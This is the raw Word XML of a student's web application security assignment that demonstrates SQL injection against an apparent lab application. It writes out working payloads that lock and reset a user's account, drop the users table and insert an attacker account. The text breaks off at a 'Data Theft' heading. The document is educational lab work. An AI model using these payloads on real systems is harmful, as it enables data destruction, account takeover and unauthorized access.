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3910" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7713AE1C" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56ACF13D" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44934136" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1899ED05" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358D8EAB" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB47B30" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16775628" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1E3DCA" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD31361" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590AD531" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46215CA1" w14:textId="77777777" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46FE5600" w14:textId="77777777" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00735F26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069EC95D" w14:textId="2CDBBF93" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00735F26" w:rsidP="00735F26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735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ITSC 302 – Web Application Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05513B07" w14:textId="101CDECF" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00735F26" w:rsidP="00735F26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735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assignment 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C71DB" w14:textId="2BEF833E" w:rsidR="00735F26" w:rsidRPr="00735F26" w:rsidRDefault="00735F26" w:rsidP="00735F26">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Submitted by Coleton Sanheim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4315C9" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C35337" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26" w:rsidP="00735F26">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3136AEBE" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D31F571" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8E21C3" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F97C8D3" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69446F6F" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A80459" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665CB737" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F4F3A0" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F5D8C20" w14:textId="77777777" w:rsidR="00735F26" w:rsidRDefault="00735F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44334D11" w14:textId="37D91DEB" w:rsidR="00C2172F" w:rsidRPr="00735F26" w:rsidRDefault="00B6445D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invalid locking/unlocking of user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C5201" w14:textId="4002A33D" w:rsidR="00B6445D" w:rsidRDefault="00B6445D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7897CEBA" w14:textId="77777777" w:rsidR="00B6445D" w:rsidRDefault="00B6445D" w:rsidP="00B6445D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Code used: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2E381" w14:textId="32A25F72" w:rsidR="00B6445D" w:rsidRDefault="00B6445D" w:rsidP="00B6445D">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4EEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'; UPDATE users SET locked = 1 WHERE username = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bob</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4EEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>";#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D41D0" w14:textId="013B2638" w:rsidR="00B6445D" w:rsidRDefault="00B6445D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This exploit allowed me to change the locked setting of user “bob” to 1, locking him from the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5535D496" w14:textId="726AE1A7" w:rsidR="00B6445D" w:rsidRDefault="00B644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A0378C" wp14:editId="05648009">
            <wp:extent cx="30384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B9E9" w14:textId="386BC509" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1972B640" w14:textId="60C66FC4" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37BAAD16" w14:textId="0F8EFAA3" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B320A4A" w14:textId="49C1B93C" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EC127B" w14:textId="268DD0CD" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29901354" w14:textId="1742429A" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6401D38D" w14:textId="351DBE9C" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51264036" w14:textId="437A33C7" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4221432B" w14:textId="111A955A" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E0512C" w14:textId="0F96D6A9" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B5C46C" w14:textId="603D3175" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269F479F" w14:textId="478B6ABD" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8AB58B" w14:textId="46636A04" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE6F118" w14:textId="2CBC1729" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D15A08" w14:textId="6877D273" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63EF1FC4" w14:textId="67A29D62" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161D2C8F" w14:textId="78431A0D" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414B5617" w14:textId="7ECDC615" w:rsidR="00BF1F7F" w:rsidRPr="00735F26" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Denial of Service (DOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373522BE" w14:textId="77B5EC98" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED6C454" w14:textId="77777777" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF1F7F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1198A02F" w14:textId="41E2FB5A" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BF1F7F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>'; DROP TABLE users;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE24B21" w14:textId="69F7FE9E" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>This exploit deleted the table “users” from the sql server and so any user wanting to log in will be denied access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194274E3" w14:textId="121408A1" w:rsidR="00BF1F7F" w:rsidRDefault="00BF1F7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ADC7119" wp14:editId="35EB948A">
            <wp:extent cx="56578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59BC149" w14:textId="6352DB38" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB0DB0B" w14:textId="6303B7F9" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B5BDA6" w14:textId="5AC5711B" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'; UPDATE users SET password = "hacked" WHERE username = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bob</w:t>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>";#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390F3C5" w14:textId="5934B055" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This exploit is similar to the unlocking/locking of user accounts but this time I changed the password of the user “bob”. This exploit effectively is a denial-of-service attack against one specific user to prevent them access to the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9EF94" w14:textId="41F3A200" w:rsidR="00C647A4" w:rsidRDefault="007820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9A59C5" wp14:editId="7E69F547">
            <wp:extent cx="309562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4C93" w14:textId="65A3A1CE" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51834629" w14:textId="555D8E5C" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012B4554" w14:textId="740F5C30" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5091E1" w14:textId="09F92E19" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376A21E4" w14:textId="7DA2F321" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5627E1" w14:textId="5744DC59" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C614AF" w14:textId="55142296" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007FCA5C" w14:textId="4182D42F" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D05C757" w14:textId="31BD0E14" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CD1D4F5" w14:textId="62E296C7" w:rsidR="00782069" w:rsidRPr="00735F26" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Invalid Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF335A" w14:textId="77777777" w:rsidR="0054009B" w:rsidRDefault="0054009B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49180798" w14:textId="32267B8A" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E3E3E" w14:textId="2AB3CD09" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'; INSERT INTO users (username, password, locked) VALUES ("</w:t>
      </w:r>
      <w:r w:rsidR="009826F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>", "</w:t>
      </w:r>
      <w:r w:rsidR="009826F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">password", </w:t>
      </w:r>
      <w:r w:rsidR="009826F6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00782069">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB1E1D6" w14:textId="77777777" w:rsidR="00782069" w:rsidRDefault="00782069">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66106AA6" w14:textId="6B871767" w:rsidR="00C647A4" w:rsidRDefault="009826F6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This exploit has allowed me to create a new user account and set a password for it, allowing me access to the application as if I was an authenticated user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3899AD40" w14:textId="67D386AA" w:rsidR="009826F6" w:rsidRDefault="009826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D0FACE" wp14:editId="10354CE4">
            <wp:extent cx="349567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D11D" w14:textId="4FB73195" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F5F845" w14:textId="1442526D" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F60CD87" w14:textId="4FB99B25" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E81B1E3" w14:textId="709203F7" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAF04E8" w14:textId="515BFA98" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A9698B" w14:textId="0E42C88C" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33146E8A" w14:textId="31E16925" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8B6F15" w14:textId="13314CC7" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655B2118" w14:textId="74117566" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD1C888" w14:textId="7706FA9F" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61C99135" w14:textId="0CD48A61" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CD62D6" w14:textId="72557D09" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AAC58B" w14:textId="36694854" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00088866" w14:textId="62656846" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675E409C" w14:textId="2721C795" w:rsidR="00C647A4" w:rsidRDefault="00C647A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F26855" w14:textId="3D607FF5" w:rsidR="0054009B" w:rsidRPr="00735F26" w:rsidRDefault="0054009B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735F26">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D13422" w14:textId="77777777" w:rsidR="0054009B" w:rsidRDefault="0054009B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43B7FD23" w14:textId="6A67D572" w:rsidR="00C647A4" w:rsidRDefault="0054009B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7465E9" w14:textId="49B06DED" w:rsidR="0054009B" w:rsidRDefault="0054009B">
